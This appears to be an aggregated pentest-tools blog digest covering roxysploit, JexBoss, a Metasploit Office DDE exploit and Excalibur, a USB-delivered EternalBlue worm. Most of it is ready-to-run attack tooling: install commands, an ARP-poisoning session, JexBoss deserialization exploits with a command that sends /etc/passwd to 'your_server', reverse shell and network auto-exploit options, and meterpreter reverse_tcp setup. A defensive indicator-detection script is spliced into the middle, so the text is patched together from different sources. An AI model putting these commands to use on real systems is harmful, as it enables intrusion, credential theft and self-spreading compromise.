roxysploit – Penetration Testing Suite

roxysploit is a community-supported, open-source penetration testing suite that supports attacks for numerous scenarios and for conducting attacks in the field.

Some of the plugins in roxysploit:

Scan is an automated information gathering plugin; it gives the user the ability to have a rest while the best information gathering plugin is executed.
Jailpwn is a useful plugin for any iPhone device that has been jailbroken; it will attempt to log in to SSH using its default password, giving you a full shell.
Eternalblue is a recent plugin we added; it exploits a vulnerability in the SMBv1/SMBv2 protocols. These were collected from the NSA cyberweapons.
Internalroute exploits multiple vulnerabilities in routers; this can become very useful, for example on hotel wifi.
Aurora is an old plugin that can become very useful for pen-testers; it exploits an Internet Explorer 6 URL vulnerability.
Doublepulsar gives you the ability to remotely inject a malicious DLL backdoor into a Windows computer.
Kodi is a fantastic movie streaming platform; however, since it runs on Linux, we have created a malicious addon (backdoor) via kodi.tv.
Bleed runs a mass vulnerability check to find any SSL vulnerabilities.
Tresspass is a way of managing your PHP backdoor and gaining a shell or even running single commands; it requires password authentication, stopping any lurker.
Handler is commonly used to create a listener on a port.
Poppy is a MITM plugin allowing you to ARP spoof and sniff unencrypted passwords on all protocols such as FTP and HTTP.
Redcarpet is a nice plugin keeping you safe from malicious hackers; it will encrypt a user directory.
Picklock is a local bruteforce plugin that you can use to picklock/bruteforce multiple devices' pincodes, such as Android USB debugging.
Passby can load a USB to steal all credentials from a Windows computer in seconds.
Dnsspoof is common for man-in-the-middle attacks; it can redirect any HTTP request to your DNS.
Smartremote is more of a funny remote exploit: you can take over a smart TV's remote control without authentication.
Blueborne is a recent Bluetooth memory leak affecting all devices, even cars.
Credswipe: you have to have a card reader to clone them.
Rfpwn: with a suitable device, you can bruteforce a special AM OOK or raw binary signal.
Ftpbrute brute-force attacks an FTP (file transfer protocol) server.
Wifijammer lets you deauth wifi networks around your area, meaning disconnecting all users connected to the network.

It is frequently updated.

Tested on:
Arch Linux    Working
Kali Linux    Working
Ubuntu        Working
Debian        Working
Centos        Not Tested
MacOSX        Needs porting
Windows       Ha no.

How to install

$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install

Executing plugins examples

rsf > use Picklock
rsf (plugins/picklock) > help

Core Commands
=============

Command     Description
-------     -----------
help        show help menu
execute     run the plugin
exit        exit the current plugin

rsf (plugins/picklock) > execute
[?] OS :: Select the devices os
*0) Android :: Bruteforce 4digit pincode usb debugging
 1) Linux :: Bruteforce Encrypted partions
[+] device: [0]:

rsf > use Poppy
rsf (plugins/poppy) > execute
[?] Interface :: Your interface
[+] interface: [wlan0]: wlp6s0
[?] Target :: Enter the targets ip
[+] target: [192.326.1.25]: 192.168.1.2
[?] Gateway :: Enter the gateway/router ip
[+] router: [192.168.1.1]:
[?] Function :: Would you like to setup dns spoofing?
*0) no :: Disable dns spoofing
 1) yes :: Enable dns spoofing
[+] function: [0]:
[?] Configuring Plugin
Name        Set Value
----        ---------
Interface   wlp6s0
Target      192.168.1.2
Router      192.168.1.1
Plugin      plugins/poppy
[?] Execute Plugins? [yes]:
[*] Enabling IP Forwarding...
[*] Poisoning Targets...

What operating systems support roxysploit?

All Linux distros are currently supported, although a prebuilt pentesting OS like Kali Linux is recommended.

Credits

0x5a Aaronius Witt TDHU Team(InsaneLand) @2017

Download roxysploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/kzGLoxuDy-I/roxysploit-penetration-testing-suite.html

JexBoss – JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks, applications, etc.

Requirements

Python >= 2.7.x
urllib3
ipaddress

Installation on Linux\Mac

To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

If you are using CentOS with Python 2.6, please install Python 2.7. Installation example of Python 2.7 on CentOS using Software Collections (scl):

yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows

If you are using Windows, you can use Git Bash to run JexBoss. Follow the steps below:

Download and install Python
Download and install Git for Windows
After installing, run Git for Windows and type the following commands:

PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

Features

The tool and exploits were developed and tested for:

JBoss Application Server versions: 3, 4, 5 and 6.
Java Deserialization Vulnerabilities in multiple Java frameworks, platforms and applications (e.g., Java Server Faces – JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc.)

The exploitation vectors are:

/admin-console: tested and working in JBoss versions 5 and 6
/jmx-console: tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker: tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet: tested and working in JBoss versions 4, 5 and 6
Application Deserialization: tested and working against multiple Java applications, platforms, etc., via HTTP POST parameters
Servlet Deserialization: tested and working against multiple Java applications, platforms, etc., via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638: tested in Apache Struts 2 applications
Others

Videos

Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
Exploiting JBoss Application Server with JexBoss
Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

Screenshots

Simple usage examples:
$ python jexboss.py

Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080

Usage modes:
$ python jexboss.py -h

Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

Results and recommendations:

Reverse Shell (meterpreter integration)

After you exploit a JBoss server, you can use JexBoss's own command shell or perform a reverse connection using the following command:

jexremote=YOUR_IP:YOUR_PORT

Example:
Shell>jexremote=192.168.0.10:4444

When exploiting Java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a command to execute.

Usage examples

For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'

For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name

For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize

For Apache Struts 2 (CVE-2017-5638):
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2

For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources:
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"

Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log

File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

More Options:

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$ (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per line)
  -out FILENAME_RESULTS
                        File name to store the file scan results

Download JexBoss
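From the defender's side, the vector list and the -D option text above give concrete things to watch for: requests to the JBoss console/invoker paths, POST bodies carrying a Java serialized object (the 0xACED0005 stream header, or "rO0AB" once base64-encoded as in javax.faces.ViewState), and egress to the webshell's update-check host. The triage function below is an added example written for this write-up, not part of JexBoss; the request dict layout and the sample requests are constructed for illustration.

```python
"""Triage HTTP requests (and one outbound one) against the JexBoss vectors
listed above: JBoss console/invoker paths, POSTs that carry a Java
serialized object (raw 0xACED0005, or "rO0AB" once base64-encoded as in
javax.faces.ViewState), and the webshell's update-check host."""
import base64

JBOSS_VECTORS = ("/admin-console", "/jmx-console",
                 "/web-console/Invoker", "/invoker/JMXInvokerServlet")
WEBSHELL_UPDATE_HOST = "webshell.jexboss.net"  # from the -D option text above
SERIAL_MAGIC = b"\xac\xed\x00\x05"             # Java ObjectOutputStream header
SERIAL_B64 = "rO0AB"                           # the same header, base64-encoded

def find_indicators(request):
    """request: dict with method, path, host, headers (dict) and body (bytes).
    Returns human-readable reasons; an empty list means nothing matched."""
    reasons = []
    path = request.get("path", "")
    for vector in JBOSS_VECTORS:
        if path == vector or path.startswith(vector + "/"):
            reasons.append("request to JBoss vector " + vector)
    if request.get("host", "").lower() == WEBSHELL_UPDATE_HOST:
        reasons.append("egress to JexBoss webshell update check")
    if request.get("method") == "POST":
        ctype = request.get("headers", {}).get("Content-Type", "").lower()
        body = request.get("body", b"")
        if "x-java-serialized-object" in ctype:
            reasons.append("serialized-object content type")
        if body.startswith(SERIAL_MAGIC) or SERIAL_B64 in body.decode("latin-1"):
            reasons.append("Java serialized object in POST body")
    return reasons

# Constructed samples: a benign page load, a JMXInvokerServlet POST, and a
# JSF form post whose ViewState parameter carries a serialized object.
SAMPLES = [
    {"method": "GET", "path": "/index.jsp", "host": "app.example",
     "headers": {}, "body": b""},
    {"method": "POST", "path": "/invoker/JMXInvokerServlet", "host": "app.example",
     "headers": {"Content-Type": "application/x-java-serialized-object"},
     "body": SERIAL_MAGIC + b"\x00" * 8},
    {"method": "POST", "path": "/page.jsf", "host": "app.example",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": b"javax.faces.ViewState=" + base64.b64encode(SERIAL_MAGIC + b"sr")},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["method"], sample["path"], find_indicators(sample) or "clean")
```

A hit on a console path alone is only a probe; a serialized body on an invoker path, or the update-check egress from a server, is the stronger signal to escalate.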

Link: http://feedproxy.google.com/~r/PentestTools/~3/qpZOA4OeFCU/jexboss-jboss-and-others-java.html

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Move module into framework:
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Open Metasploit and load exploit:
msfconsole
reload_all
use exploit/windows/dde_delivery

Set the server host:
set SRVHOST 192.168.1.10

Choose payload and run it:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 443
exploit

Copy paste the code into any Word/Excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/

Excalibur – An Eternalblue exploit payload based Powershell

Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project. Its purpose is to reflect on how a "simple" USB drive can execute the 7 steps of the cyber kill chain. Excalibur may be used for demonstration purposes only, and the developers are not responsible for any misuse or illegal usage.

What does it do?

When Excalibur gets connected to the machine, it will run the following:

Tries to bypass UAC, or just get administrative rights.
Gets interface info (IP addresses) and builds a network map inside a TXT file.
Scans port 445 for the known "MS10-17" ("EternalBlue") vulnerability in every segment found.
Exploits every machine and drops a shell to a remote machine.

How to?

Follow the steps here to compile a shellcode: https://github.com/vivami/MS17-010
Copy payload.txt to the switch folder.
Copy "eternablblue_exploit7.py" and compile it using Pyinstaller:
"pip install pyinstaller"
"pyinstaller --onefile eternablblue_exploit7.py"
Add your shellcode and the compiled exploiter into "a.zip" and copy it to the "loot" folder. a.zip needs to contain a compiled, standalone eternalblue exploiter from "vivami's" repo and the shellcode.
Copy the powershell script (p_v2.ps1) to the loot folder.

TODO

Add persistence in terms of adding a new user account, and a persistent shell.
Exploit other machines and applications in the network, with the credentials added in the persistence step.
Exfiltrate sensitive data from the network, outside.
Bug fixes, and exploit stabilization.

Notes

Excalibur is still in Beta, bugs are imminent.

Download Excalibur

Link: http://feedproxy.google.com/~r/PentestTools/~3/WW_tYNzj9lw/excalibur-eternalblue-exploit-payload.html